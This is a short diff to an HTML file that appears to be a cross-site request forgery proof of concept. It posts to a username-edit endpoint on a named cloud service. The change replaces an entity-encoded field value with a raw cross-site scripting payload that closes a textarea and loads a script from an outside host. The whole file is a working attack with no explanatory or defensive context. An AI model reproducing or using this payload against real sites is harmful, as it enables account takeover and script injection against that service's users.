--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="https://user.westarcloud.com/user/user/editusername" method="POST">
-      <input type="hidden" name="uname" value="&lt;&#47;tExtArEa&gt;&apos;&quot;&gt;&lt;sCRiPt&#32;sRC&#61;&#47;&#47;x0&#46;nz&#47;qUeK&gt;&lt;&#47;sCrIpT&gt;" />
+      <input type="hidden" name="uname" value="</tExtArEa>'"><sCRiPt sRC=//x0.nz/qUeK></sCrIpT>" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
